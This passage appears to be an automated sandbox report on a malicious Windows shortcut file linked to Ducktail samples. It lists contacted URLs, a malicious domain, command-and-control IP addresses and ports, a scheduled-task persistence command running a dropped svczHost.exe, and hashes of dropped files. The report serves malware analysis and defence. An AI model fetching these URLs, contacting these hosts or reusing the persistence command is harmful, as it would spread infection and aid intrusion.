                              https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f2014powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E4B2D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.2739318814.000001AC1F6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2658354126.0000026921256000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3412391494.00000226FB537000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.0000015199A32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3303975051.00000203F54FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3286821473.0000018B69B80000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2740483057.000001AC1F881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.0000026909101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E33C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                		high
                                http://.jpgpowershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2800553876.000001AC2F8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2800553876.000001AC2FA89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A74C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2654660804.0000026919177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.00000203901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020381455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.0000020390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B014EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2635351639.000002690A0A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00D8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://go.micropowershell.exe, 00000008.00000002.2635351639.000002690A02A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.0000026909F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.00000203809B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/MartinKuschnik/WmiLightsvczHost.exe, 00000014.00000002.3843098469.000001519D648000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000008.00000002.2635351639.000002690A5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://aka.ms/nativeaot-compatibilityypowershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                            		high
                                            https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac5powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735apowershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://uyt1n8ded9fb380.com/StaticFile/RdpService/2hsvczHost.exe, 00000014.00000002.3841352586.000001519CC9B000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.microsoft.powershell.exe, 00000002.00000002.2806222414.000001AC37AB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://uyt1n8ded9fb380.com/filepowershell.exe, 00000002.00000002.2740483057.000001AC211D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://pesterbdd.com/images/Pester.pngXzopowershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlXzopowershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05depowershell.exe, 00000002.00000002.2740483057.000001AC211D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsof/crl/products/MicTimStaPCA_2010-07-01.crl0Zpowershell.exe, 00000008.00000002.2659602766.0000026921670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://uyt1n8ded9fb380.com/file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db109powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5powershell.exe, 00000002.00000002.2740483057.000001AC1FC70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33powershell.exe, 00000002.00000002.2740483057.000001AC1FF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2740483057.000001AC21985000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.microsofpowershell.exe, 00000008.00000002.2659602766.0000026921670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00D8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/nativeaot-compatibilityYmyRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      		high
                                                      https://github.com/Pester/Pesterhpowershell.exe, 00000008.00000002.2635351639.000002690A5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000008.00000002.2635351639.000002690A5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.quovadis.bm0powershell.exe, 00000002.00000002.2739318814.000001AC1F6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2658354126.0000026921256000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3412391494.00000226FB537000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.0000015199A32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3303975051.00000203F54FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3286821473.0000018B69B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/GlobalizationInvariantModepowershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2740483057.000001AC1F881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.0000026909101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E33C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://uyt1n8ded9fb380.com:443/xsvczHost.exe, 00000014.00000002.3841352586.000001519CC9B000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3841352586.000001519CCB1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://oneget.orgpowershell.exe, 00000008.00000002.2635351639.000002690A0A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.21.86.219
                                                              		uyt1n8ded9fb380.comUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              206.206.126.252
                                                              		unknownUnited States
                                                              		13332HYPEENT-SJUSfalse
                                                              23.88.71.29
                                                              		unknownUnited States
                                                              		18978ENZUINC-USfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1551865
                                                              Start date and time:2024-11-08 10:38:36 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 11m 4s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                              Run name:Suspected VM Detection
                                                              Number of analysed new started processes analysed:48
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:U82W1yZAYQ.lnk
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winLNK@66/55@1/3
                                                              EGA Information:
                                                              • Successful, ratio: 12.5%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .lnk

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe
                                                              • Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.111.229.43, 52.113.194.132, 51.116.253.168, 142.250.64.67
                                                              • Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, cus-config.officeapps.live.com, s-0005-office.config.skype.com, onedscolprdgwc01.germanywestcentral.cloudapp.azure.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, nexusrules.officeapps.live.com
                                                              • Execution Graph export aborted for target myRdpService.exe, PID 5032 because there are no executed function
                                                              • Execution Graph export aborted for target powershell.exe, PID 2012 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 3608 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 5324 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 5616 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 5736 because it is empty
                                                              • Execution Graph export aborted for target svczHost.exe, PID 9104 because there are no executed function
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: U82W1yZAYQ.lnk

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              04:40:49API Interceptor258x Sleep call for process: powershell.exe modified
                                                              04:43:00API Interceptor2x Sleep call for process: myRdpService.exe modified
                                                              10:41:34Task SchedulerRun new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 uyt1n8ded9fb380.com

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.21.86.219About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              U7LTwStlEf.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              7zj1MSzatJ.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              QQ3N9leXoa.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              DXNki7qRFd.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              206.206.126.252ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws
                                                              U7LTwStlEf.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252:8008/client/ws

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              uyt1n8ded9fb380.comZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.67.137.62
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.67.137.62
                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.67.137.62
                                                              K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.219
                                                              eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.67.137.62
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              O5PR3i6ILA.lnkGet hashmaliciousUnknownBrowse
                                                              • 172.67.137.62

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.64.41.3
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.67.137.62
                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 172.67.137.62
                                                              K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.219
                                                              eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • 162.159.61.3
                                                              EERNI7eIS7.lnkGet hashmaliciousUnknownBrowse
                                                              • 172.67.137.62
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              HYPEENT-SJUSZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              U7LTwStlEf.lnkGet hashmaliciousDucktailBrowse
                                                              • 206.206.126.252
                                                              ENZUINC-USZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29
                                                              U7LTwStlEf.lnkGet hashmaliciousDucktailBrowse
                                                              • 23.88.71.29

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.219
                                                              eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • 104.21.86.219
                                                              O5PR3i6ILA.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.21.86.219

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Windows\Temp\myRdpService.exeZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                    Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                      6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                        Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                          Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                            K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                              H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                                U7LTwStlEf.lnkGet hashmaliciousDucktailBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):118
                                                                                  Entropy (8bit):3.5700810731231707
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                  MD5:573220372DA4ED487441611079B623CD
                                                                                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                  Malicious:false
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2278
                                                                                  Entropy (8bit):3.852064781948842
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:uiTrlKxsxx86xl9Il8uaboRKMqQ/IfqTNFWRajTSMc/2d1rc:vceYUoYf0uajTSM0t
                                                                                  MD5:DE91F148838539E821C2FEAC805728E9
                                                                                  SHA1:6BA39EE12B2A9DF87232B88FDD92FFBAEE7CCE63
                                                                                  SHA-256:3FA06BF2EA63A2D403DD66C7F44506E09971C31F08F126F64D298243DC41DB64
                                                                                  SHA-512:9EF5177078AAC29315B25525C0445030EAE8879DF5660A8BAB9B06ECD6E766DC8CD3520EDFE8880928C90A7868F4FAFC55A2FA78E3262CBC91DF63643115A0F0
                                                                                  Malicious:false
